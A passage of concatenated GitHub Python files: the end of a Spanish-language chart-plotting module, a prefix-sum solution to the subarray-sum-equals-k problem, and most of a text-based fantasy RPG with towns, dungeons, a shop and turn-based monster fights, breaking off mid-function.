10)\n            elif tipoGrafico == \"Histograma\":\n                graf = self.graficarHistograma(df)\n            \n            graf.savefig(os.getcwd() + \"//DATA//GRAFICOS//Grafico Personalizado.png\", bbox_inches='tight')\n            \n        except Exception as e:\n            BLL_Log.Log().escribir(\"Error in Grafico Personalizado: \" + str(e), cliente.nombre, \"error\")\n\n        return graf\n    \n\n    def graficoPersonalizadoDash(self, tipoGrafico, tipoDato, columna, cliente, fechaInicio, fechaFin, top = None):\n        pixmap = \"\"\n        try:\n            dataframe = BLL_Dataframe_Personalizado.Dataframe_Personalizado() \n            filas = dataframe.leerEventosDB(fechaInicio, fechaFin, cliente, tipoDato)\n            df = dataframe.crearDataframePersonalizado(filas)\n            if tipoGrafico == \"Torta\":\n                graf = self.graficarTorta(df, columna, 10)\n            elif tipoGrafico == \"Barras\":\n                graf = self.graficarBarras(df, columna, 10)\n            elif tipoGrafico == \"Histograma\":\n                graf = self.graficarHistograma(df)\n            \n            
rutaGraficoTemporal = os.getcwd() + \"//DATA//GRAFICOS//graficoTemporal.png\"\n            graf.savefig(rutaGraficoTemporal, bbox_inches='tight')\n            print(df)\n            pixmap = QPixmap(rutaGraficoTemporal)\n            os.remove(rutaGraficoTemporal)\n            \n        except Exception as e:\n            BLL_Log.Log().escribir(\"Error in Grafico PersonalizadoDash: \" + str(e), \"general\", \"error\")\n\n        return pixmap\n\n\n    \n\n    def __del__(self):\n        gc.collect()","repo_name":"MusicLab/Automatization","sub_path":"BLL/BLL_Grafico_Personalizado.py","file_name":"BLL_Grafico_Personalizado.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30974471184","text":"'''\nGiven an array of integers nums and an integer k, return the total number of subarrays whose sum equals to k.\n\nExample 1:\n\nInput: nums = [1,1,1], k = 2\nOutput: 2\n\nExample 2:\nInput: nums = [0,0,0,0,0,0,0,0], k = 0\nOutput: 36\n\n'''\n'''\nTC:- O(n) where n is the length of the array\nSC:- O(n) for hash Map\n'''\nfrom typing import List\n\nclass Solution:\n    def subarraySum(self, nums: List[int], k: int) -> int:\n        frequency = {}\n        Answer = 0;\n        Sum = 0;\n        for i in range(len(nums)):\n            Sum += nums[i];\n            if Sum == k :\n                Answer += 1;\n            if Sum-k in frequency:\n                Answer += frequency[Sum-k];\n            frequency[Sum] = frequency.get(Sum,0) + 1\n        \n        return Answer\n        \n","repo_name":"shreyatpandey/Coding-Challenges","sub_path":"Fb_ph/Practice/Python/Subarray Sum Equals K.py","file_name":"Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13749777171","text":"from dataclasses import dataclass\nfrom random import choice\nimport random\nimport pickle\nimport os\nfrom typing import List, Tuple\n\n@dataclass\nclass Player:\n    name: str\n    max_health: int\n    health: int\n    max_mana: int\n    mana: int\n    p_class: str\n    advanced_class: str\n    level: int\n    xp: int\n    gold: int\n    orb: int\n    curr_weapon: str\n    health_potion: int\n    mana_potion: int\n    skills: list\n    inventory: list\n    sideloc: str\n    end: str\n\nskill_damage = {\n    \"Vertical Arc\": 8,\n    \"Fireball\": 8,\n    \"Long Shot\": 8,\n    \"Howling Octave\": 15,\n    \"Lunar Tempest\": 15,\n    \"Sneak Attack\": 15,\n    \"Deadly Sins\": 22,\n    \"Soul Rain\": 22,\n    \"Sinister Strike\": 22,\n}\nskill_cost = {\n    \"Vertical Arc\": 5,\n    \"Fireball\": 5,\n    \"Long Shot\": 5,\n    \"Howling Octave\": 10,\n    \"Lunar Tempest\": 10,\n    \"Sneak Attack\": 10,\n    \"Deadly Sins\": 15,\n    \"Soul Rain\": 15,\n    \"Sinister Strike\": 15,\n}\nweapons = {\"Rusted Sword\": 5, \"Short Sword\": 14, \"Claymore\": 20, \"God Sword\": 60}\n\ninventory = [\"Rusted Sword\", \"God Sword\"]\n\ntowns = {\n    \"Waverly\": \"Situated on the base of a geyser field, the hamlet of Waverly is home to vikings led by Lord Lockridge. \\nThis hamlet wasn't built by a geyser field by accident, as it has an abundance of minerals, which is of great importance to the people of Waverly and its success. \\nThe hamlet itself looks unattractive. With its rusted rooftops, rusted walls and whistling wind, Waverly has a gloomy atmosphere. \\nWaverly has a mending economy, which is mainly supported by woodcrafting, jewelcrafting and baking. But their biggest strengths are alchemy and advanced medicine. \\nHowever, Waverly lacks people skilled in animal breeding.\\n[Road1(to Kingston or Oakland), Forrest1, Jagged Tombs]\",\n    \"Oakland\": \"Forged next to a cave, the village of Oakland is home to elves led by Supervisor Ninleyn. 
\nThis village wasn't built by a cave by accident, as it has fertile soils, which is of great importance to the people of Oakland and its success. \\nThe village itself looks sublime. With its elm wood rooftops, ironwood walls and luscious gardens, Oakland has a charming atmosphere. \\nOakland has a wounded economy, which is mainly supported by fletching, trade and baking. But their biggest strengths are deadly archers and delicate woodcrafting. \\nHowever, Oakland lacks people skilled in alchemy.\\n[Road1(to Riverside or Waverly), Forrest1, Lifeless Labyrinth]\",\n    \"Kingston\": \"Formed inside a field, the burg of Kingston is home to orcs led by Marshal Grikug. \\nThis burg wasn't built by a field by accident, as it has rare plants, which is of great importance to the people of Kingston and its success. \\nThe burg itself looks delightful. With its silky oak wood rooftops, lavastone walls and frozen lakes, Kingston has a pleasing atmosphere. \\nKingston has a declining economy, which is mainly supported by baking, alchemy and thieving. But their biggest strengths are sophisticated cooking and skilled fighters. \\nHowever, Kingston lacks people skilled in animal training.\\n[Road1(to Waverly or Riverside), Forrest1, Shadowed Dungeon]\",\n    \"Riverside\": \"Based on the Northern side of a waterfall, the port of Riverside is home to high elves led by Director Alwin. \\nThis port wasn't built by a waterfall by accident, as it has unique wildlife, which is of great importance to the people of Riverside and its success. \\nThe port itself looks impressive. With its cypress wood rooftops, mahogany wood walls and silent mountain range, Riverside has an intriguing atmosphere. \\nRiverside has a hurting economy, which is mainly supported by hunting, thieving and beer brewing. But their biggest strengths are skilled fighters and intricate fletching techniques. \\nHowever, Riverside lacks people skilled in tailoring.\\n[Road1(to Oakland or Kingston), Forrest1, Dreadful Tunnels]\",\n    \"Jagged Tombs\": \"A short worn statue in a murky woodlands marks the entrance to this dungeon.\\n[Waverly]\",\n    \"Dreadful Tunnels\": \"A grand fallen temple in a gloomy grove marks the entrance to this dungeon.\\n[Riverside, Entrance]\",\n    \"Shadowed Dungeon\": \"A wide worn statue in a somber boulder field marks the entrance to this dungeon.\\n[Kingston]\",\n    \"Lifeless Labyrinth\": \"A tall broken statue in a misty woodlands marks the entrance to this dungeon.\\n[Oakland]\",\n    \"Crypt of the Conquered King\": \"A Magic Veil was lifted, so now the entrance is revealed. \\nA huge ancient monument of a dragon is the entrance to this dungeon.\\n[Forrest1, Forrest3, Entrance]\",\n    \"Forrest2\": \"There is a weird magical veil here. You can tell that it is close to being shattered. You can't tell exactly where the magic is at, or where it's coming from.\",\n    \"Road1\": \"It is sort of peaceful, nothing really happens close to towns.\\n[Road2, name of last town]\",\n    \"Road2\": \"You hear birds, squirrels, and other wildlife. Nothing should happen on a road anyway. You come to a place where a small fire is on the side of the road with a man and a woman. They wave at you and say to be careful. You never know what could happen.\\n[Road1, Road3]\",\n    \"Road3\": \"It is sort of peaceful, nothing really happens close to towns.\\n[Road2, name of next town]\",\n}\n\nforrest = {\n    1: \"As you walk through the path, you have a feeling of being watched. You start to hear the leaves near you crackle. 
As you hear this, a squirrel pops out and scurries across the path.\",\n    2: \"As you are walking, you hear leaves in the trees to your right. The birds are singing, and flowers are blooming. On days like this, people like you shouldn't be adventuring; it is so nice outside.\",\n    3: \"You notice to your right a small clearing for a camp. There is a small tent there. As you pass by, a goblin comes out and attacks.\",\n    4: \"On your way, you notice a patch of grass in your way, and hear a small cry coming from it. As you travel through it, you are attacked by a few slimes.\",\n}\n\n\nmvmt = [\n    (\"Waverly\", \"Road1\"),\n    (\"Waverly\", \"Forrest1\"),\n    (\"Waverly\", \"Jagged Tombs\"),\n    (\"Riverside\", \"Dreadful Tunnels\"),\n    (\"Riverside\", \"Road1\"),\n    (\"Riverside\", \"Forrest1\"),\n    (\"Oakland\", \"Road1\"),\n    (\"Oakland\", \"Forrest1\"),\n    (\"Oakland\", \"Lifeless Labyrinth\"),\n    (\"Kingston\", \"Road1\"),\n    (\"Kingston\", \"Forrest1\"),\n    (\"Kingston\", \"Shadowed Dungeon\"),\n    (\"Road1\", \"Road2\"),\n    (\"Road1\", \"Waverly\"),\n    (\"Road1\", \"Riverside\"),\n    (\"Road1\", \"Oakland\"),\n    (\"Road1\", \"Kingston\"),\n    (\"Forrest1\", \"Forrest2\"),\n    (\"Forrest1\", \"Waverly\"),\n    (\"Forrest1\", \"Riverside\"),\n    (\"Forrest1\", \"Oakland\"),\n    (\"Forrest1\", \"Kingston\"),\n    ('Forrest2', 'Forrest1'),\n    ('Forrest2', 'Forrest3'),\n    (\"Road3\", \"Road2\"),\n    (\"Road3\", \"Waverly\"),\n    (\"Road3\", \"Riverside\"),\n    (\"Road3\", \"Oakland\"),\n    (\"Road3\", \"Kingston\"),\n    (\"Forrest3\", \"Forrest2\"),\n    (\"Forrest3\", \"Waverly\"),\n    (\"Forrest3\", \"Riverside\"),\n    (\"Forrest3\", \"Oakland\"),\n    (\"Forrest3\", \"Kingston\"),\n    (\"Road2\", \"Road3\"),\n    (\"Road2\", \"Road1\"),\n    ('Crypt of the Conquered King', 'Forrest1'),\n    ('Crypt of the Conquered King', 'Forrest3'),\n    (\"Jagged Tombs\", \"Waverly\"),\n    (\"Dreadful Tunnels\", \"Riverside\"),\n    (\"Lifeless Labyrinth\", \"Oakland\"),\n    (\"Shadowed Dungeon\", \"Kingston\"),\n]\n\ndreadfull_tunn_des = {\n    \"Entrance\": \"Beyond the fallen temple lies a small, dank room. It's covered in broken pottery, dirt and broken stone. Your torch allows you to see broken mining equipment, tattered and spoiled by time itself. Further ahead are three paths, and the left is a dead end. \\n[Hall1, Hall2, Exit]\",\n    \"Hall1\": 'It is a small hallway with one room at the end of it. The door says \"tokeq\" \\n[Entrance, Room1]',\n    \"Hall2\": 'It is a small hallway with two rooms at the end of it. The door says \"tokeq\" \\n[Entrance, Room2, Room3]',\n    \"Hall3\": 'It is a small hallway between two rooms. The door says \"tokeq\" \\n[Room2, Room1]',\n    \"Room1\": \"You enter a semi dark area. The floor is cracked and broken in spots. \\n[Hall3, Hall2]\",\n    \"Room2\": \"This room is a small room with barren walls. The walls look like they have had oil on them for a while. There is one table in the room with an old paper dating 987 on it. There is nothing else in the room.\\n[Hall2, Hall3]\",\n    \"Room3\": \"It is a small humid room. You notice there is water running up the wall, not down like you would expect. \\n[Hall2]\",\n    \"Room4\": \"You enter a humid area. Piles and piles of gold lie in the center; several skeletons lie next to it. \\n[Hall5, Hall2]\",\n    \"Hall5\": \"This hallway is decorated in small nests, large nests, and one huge nest. At a few points in the hall, you can tell where some rooms or hallways were, but the roof is caved in at those places. There are a few rooms and a hallway. 
\n[Room4, Hall4, Room5, Hall6, Room9]\",\n    \"Hall4\": \"This is a small hallway leading to a small room.\\n[Hall5, Room7]\",\n    \"Room7\": \"The room is small, as it looks like an abandoned laboratory.\\n[Hall4]\",\n    \"Room5\": \"This is a small room; you can see that the papers and books are all from a previous era.\\n[Hall5]\",\n    \"Hall6\": \"It is a small hallway with torches on the sides.\\n[Hall5, Room6]\",\n    \"Room6\": \"A small room with standing water. As you enter, small mice scurry around.\\n[Hall6, Hall7]\",\n    \"Hall7\": \"The small hallway splits off into two paths. One however, is blocked off by debris.\\n[Room6, Hall8]\",\n    \"Hall8\": \"The small hallway is leading into a small room.\\n[Room9, Hall7]\",\n    \"Room9\": \"You eventually make it to what is likely the final room. A huge wooden door blocks your path. Various odd symbols are all over it, somehow untouched by time and the elements. You step closer to inspect it and.. wait.. you hear a loud bang in the distance from which you came. Out of panic, you turn around to claw at the doors to find that they are now wide open. You enter.\",\n    \"BossRoom\": \"The doors slam shut behind you. \\nThe room is huge and lined with nests small, large, huge, and one big enough to fit an elephant. You hear a loud sound, resembling a rat, from above. As you hear this, a rat the size of a car falls from the ceiling.\",\n}\n\ndreadfull_tunnels:List[Tuple] = [\n    (\"Entrance\", \"Exit\"),\n    (\"Entrance\", \"Hall1\"),\n    (\"Entrance\", \"Hall2\"),\n    (\"Hall1\", \"Entrance\"),\n    (\"Hall1\", \"Room1\"),\n    (\"Hall2\", \"Entrance\"),\n    (\"Hall2\", \"Room2\"),\n    (\"Hall2\", \"Room3\"),\n    (\"Hall3\", \"Room1\"),\n    (\"Hall3\", \"Room2\"),\n    (\"Hall4\", \"Hall5\"),\n    (\"Hall4\", \"Room7\"),\n    (\"Hall5\", \"Room4\"),\n    (\"Hall5\", \"Hall4\"),\n    (\"Hall5\", \"Room5\"),\n    (\"Hall5\", \"Hall6\"),\n    (\"Hall5\", \"Room9\"),\n    (\"Hall6\", \"Hall5\"),\n    (\"Hall6\", \"Room6\"),\n    (\"Hall7\", \"Room6\"),\n    (\"Hall7\", \"Hall8\"),\n    (\"Hall8\", \"Room9\"),\n    (\"Hall8\", \"Hall7\"),\n    (\"Room1\", \"Hall3\"),\n    (\"Room1\", \"Hall2\"),\n    (\"Room2\", \"Hall2\"),\n    (\"Room2\", \"Hall3\"),\n    (\"Room3\", \"Hall2\"),\n    (\"Room4\", \"Hall5\"),\n    (\"Room4\", \"Hall6\"),\n    (\"Room5\", \"Hall5\"),\n    (\"Room6\", \"Hall6\"),\n    (\"Room6\", \"Hall7\"),\n    (\"Room7\", \"Hall4\"),\n    (\"Room9\", \"BossRoom\"),\n    (\"BossRoom\", \"Exit\"),\n]\n\n\nBossDungeonMvmt = {\n    'Entrance': \"A Magic Veil was lifted, so now the entrance is revealed. \\nA huge ancient monument of a dragon is the entrance to this dungeon. \\nAs you pass the monument, it looks at you and roars. It then goes back to being a monument.\\n[Room1, Exit]\",\n    'Room1': 'The room is a small entrance room. The small doors look to be that of dwarven status. The floor and walls seem to be stone that has been there since the time of the Gods. You see farther in that there are two paths with rooms on the end of them. One path is blocked by iron bars. In the center, you see a slot for mail, a place to open and shoot arrows from, and a place at the bottom for sliding small sacks of food through.\\n[Entrance, Room2]',\n    'Room2': 'In the center of the room, there is a table with small health and mana potions. You think to yourself that it would be a waste to leave them, so you take them.\\n[Room1, Room3]',\n    'Room3': 'This room is a large, rounded, hallway room. If you do not know what a rounded hallway room is, it is a circular hallway that has a room in the very center. 
There are two chests in this room with a key, two large health potions, a mana potion, and a few pieces of gold.\\n\\nYou take the gold, key, and potions.\\n[Room5, Room4, Room8, Hall1, Room2]',\n    'Hall1': 'This hallway is small and round. It leads to a small room that is empty with a large chasm opened up at the end below a crack. Past the crack is a room with a chest that looks like it has not been touched in years.\\n[Room7, Room3]',\n    'Room7': 'As you jump across the chasm, you hear a loud roar below as fire and smoke come up from the chasm. After a few seconds, the smoke dissipates. The chest contains a pile of gold and a weird looking key.\\n[Hall1]',\n    'Room4': 'In this room, there are just empty boxes and crates. There are also tables and chairs.\\n[Room3]',\n    'Room5': 'The room has a square hole in the center. It leads down to the chasm below. Around it and on the ceiling, you can see burn marks and soot.\\n[Room3]',\n    'Room8': 'In this room, you see stairs leading to the chasm below.\\n[Chasm, Room3]',\n    'Chasm': \"As you descend the stairs, you see a huge dragon skeleton. The skeleton looks like it hasn't been touched in hundreds of years. You do notice a small mark on the skull. You go closer to look at it, and as you do, the dragon skeleton rises and roars.\"\n}\n\nshop_inv = [\n    \"1 Health Potion\",\n    \"3 Health Potions\",\n    \"5 Health Potions\",\n    \"7 Health Potions\",\n    \"1 Mana Potion\",\n    \"3 Mana Potions\",\n    \"5 Mana Potions\",\n    \"7 Mana Potions\",\n    \"Short Sword\",\n    \"Claymore\"\n]\nshop_price = [20,35,75,100,20,35,75,100,20,30]\n\n\ndef shop(player:Player) -> None:\n    print(\"Welcome to the shop.\\n\\n\")\n    for l,r in zip(shop_inv, shop_price):\n        print(l,r)\n    buy=input(\"> \").title()\n    if buy not in shop_inv:\n        print(\"We don't have that here.\")\n        return\n    i = shop_inv.index(buy)\n    if player.gold < shop_price[i]:\n        print(\"You don't have enough gold.\")\n        return\n    player.gold -= shop_price[i]\n    if buy == \"1 Health Potion\":\n        player.health_potion += 1\n    elif buy == \"3 Health Potions\":\n        player.health_potion += 3\n    elif buy == \"5 Health Potions\":\n        player.health_potion += 5\n    elif buy == \"7 Health Potions\":\n        player.health_potion += 7\n    elif buy == \"1 Mana Potion\":\n        player.mana_potion += 1\n    elif buy == \"3 Mana Potions\":\n        player.mana_potion += 3\n    elif buy == \"5 Mana Potions\":\n        player.mana_potion += 5\n    elif buy == \"7 Mana Potions\":\n        player.mana_potion += 7\n    elif buy == \"Short Sword\":\n        player.inventory.append(\"Short Sword\")\n    elif buy == \"Claymore\":\n        player.inventory.append(\"Claymore\")\n\nBoss_val:List[Tuple] = [\n    ('Entrance', 'Room1'),\n    ('Room1', 'Entrance'),\n    ('Room1', 'Room2'),\n    ('Room2', 'Room3'),\n    ('Room2', 'Room1'),\n    ('Room3', 'Room2'),\n    ('Room3', 'Room4'),\n    ('Room3', 'Room5'),\n    ('Room3', 'Hall1'),\n    ('Room3', 'Room8'),\n    ('Hall1', 'Room7'),\n    ('Hall1', 'Room3'),\n    ('Room8', 'Chasm'),\n    ('Room4', 'Room3'),\n    ('Room5', 'Room3'),\n    ('Room8', 'Room3'),\n    ('Entrance', 'Exit'),\n    ('Room7', 'Hall1')\n\n]\n\ndef use_potion(player: Player) -> None:\n    print(\"\\nDo you want to use a [Health Potion] or [Mana Potion]?\")\n    action = input(\"> \").title()\n    if action == \"Health Potion\":\n        if player.health_potion == 0:\n            print(\"You have no health potions.\")\n        else:\n            print(\"You drink a health potion, and recovered 30 health!\")\n            player.health += 30\n            player.health_potion -= 1\n    elif action == \"Mana Potion\":\n        if player.mana_potion == 0:\n            print(\"You have no mana potions.\")\n        else:\n            print(\"You drink a mana potion, and recovered 30 mana!\")\n            player.mana += 30\n            player.mana_potion -= 
1\n\ndef DragonFight(player: Player) -> None:\n print(\n \"As you walk into the room, you see something move. You prepare your weapon just in case but are forced to dodge as a fireball lands right where you were. Standing back up, you see what the monster is. A skeletal dragon that is ready to attack!\"\n )\n monsterhp = 300\n monster = \"Skeletal Dragon\"\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"Monster Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(20,40)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8,16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. 
It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n player.xp += 60\n player.gold += 250\n player.end='END'\n\n\n\ndef BossFight(player: Player) -> None:\n monsterhp = 150\n monster = \"Giant Rat\"\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"Monster Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8,16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. 
It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n    player.xp += 40\n    player.gold += 180\n\ndef skeletonfight(player: Player) -> None:\n    print(\"As you go to take the gold, a skeleton jumps out and attacks!\")\n    monsterhp = 60\n    monster = \"Skeleton\"\n    while monsterhp > 0 and player.health > 0:\n        print(f\"Player Health: {player.health}\")\n        print(f\"Player Mana: {player.mana}\")\n        print(f\"{monster} Health: {monsterhp}\")\n        if player.p_class == \"Knight\":\n            move = input(\n                \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n            ).title()\n            if move == \"Sword Skill\" and player.mana <= 4:\n                print(\"\\nYou have no mana and failed to attack!\")\n            elif move == \"Sword Skill\":\n                print(player.skills)\n                skill = sword_skill_input()\n                if skill in player.skills:\n                    roll = random.randint(1,10)\n                    hit = roll\n                    if hit != 3 and hit != 7:  # a roll of 3 or 7 is a miss\n                        player_damage = skill_damage[skill]\n                        monsterhp -= player_damage\n                        print(f\"You used {skill}, it does {player_damage} damage.\")\n                        player.mana -= skill_cost[skill]\n                    else:\n                        print(\"You missed!\")\n                        player.mana -= skill_cost[skill]\n            elif move == \"Attack\":\n                roll = random.randint(1,10)\n                hit = roll\n                if hit != 3 and hit != 7:\n                    player_damage = weapons[player.curr_weapon]\n                    print(f\"You used {move}, it does {player_damage} damage.\")\n                    monsterhp -= player_damage\n                else:\n                    print(\"You missed!\")\n            elif move == \"Potion\":\n                use_potion(player)\n            else:\n                print(\"This action is unavailable!\")\n            enemy_damage = random.randint(1, 8)\n            print(\n                f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n        elif player.p_class == \"Mage\":\n            print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n            move = input(\"> \").title()\n            if move == \"Spell\" and player.mana <= 4:\n                print(\"\\nYou have no mana and failed to attack!\")\n            elif move == \"Spell\":\n                print(player.skills)\n                spell = spell_input()\n                if spell in player.skills:\n                    if player.mana < skill_cost[spell]:\n                        print(\"You have no mana and failed to attack!\")\n                    else:\n                        roll = random.randint(1,10)\n                        hit = roll\n                        if hit != 3 and hit != 7:\n                            player_damage = skill_damage[spell]\n                            monsterhp -= player_damage\n                            print(f\"You used {spell}, it does {player_damage} damage.\")\n                            player.mana -= skill_cost[spell]\n                        else:\n                            print(\"\\nYou missed!\")\n                            player.mana -= skill_cost[spell]\n            elif move == \"Attack\":\n                roll = random.randint(1,10)\n                hit = roll\n                if hit != 3 and hit != 7:\n                    player_damage = weapons[player.curr_weapon]\n                    print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n                    monsterhp -= player_damage\n                else:\n                    print(\"\\nYou missed!\")\n            elif move == \"Potion\":\n                use_potion(player)\n            else:\n                print(\"This action is unavailable!\")\n            enemy_damage = random.randint(1, 8)\n            print(\n                f\"\\nIt is now the monster's turn.\\nThe monster attacks. 
It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n            if player.health < 0:\n                break\n        elif player.p_class == \"Rogue\":\n            print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n            move = input(\"> \").title()\n            if move == \"Skill\":\n                print(player.skills)\n                skill = rogue_input()\n                if skill in player.skills:\n                    roll = random.randint(1,10)\n                    hit = roll\n                    if hit != 3 and hit != 7:\n                        player_damage = skill_damage[skill]\n                        monsterhp -= player_damage\n                        print(f\"You used {skill}, it does {player_damage} damage.\")\n                        player.mana -= skill_cost[skill]\n                    else:\n                        print(\"You missed!\")\n                        player.mana -= skill_cost[skill]\n            elif move == \"Attack\":\n                roll = random.randint(1,10)\n                hit = roll\n                if hit != 3 and hit != 7:\n                    player_damage = weapons[player.curr_weapon]\n                    print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n                    monsterhp -= player_damage\n                else:\n                    print(\"You missed!\")\n            elif move == \"Potion\":\n                use_potion(player)\n            else:\n                print(\"This action is unavailable!\")\n            enemy_damage = random.randint(1, 8)\n            print(\n                f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n    player.xp += 15\n    player.gold += 30\n\ndef BossDun(player: Player, location: str) -> None:\n    location='Entrance'\n    print(BossDungeonMvmt[\"Entrance\"])\n    while player.health > 0:\n        if location == \"Exit\":\n            location = \"Forrest2\"\n            break\n        else:\n            goto = input(\"> \").title()\n            if (location, goto) in Boss_val:\n                location = goto\n                if location=='Exit':\n                    location = \"Forrest1\"\n                    break\n                elif location == \"Chasm\":\n                    print(BossDungeonMvmt['Chasm'])\n                    DragonFight(player)\n                    break\n                else:\n                    print(BossDungeonMvmt[goto])\n\n            else:\n                print(\"You cannot go there.\")\n\ndef DreadTun(player: Player, location: str) -> None:\n    location='Entrance'\n    print(dreadfull_tunn_des[\"Entrance\"])\n    while player.health > 0:\n        if location == \"Exit\":\n            location = \"Dreaded Tunnels\"\n            break\n        else:\n            goto = input(\"> \").title()\n            if (location, goto) in dreadfull_tunnels:\n                location = goto\n                print(dreadfull_tunn_des[goto])\n                if location == \"Room4\":\n                    act = input(\"Do you want to take the gold? 
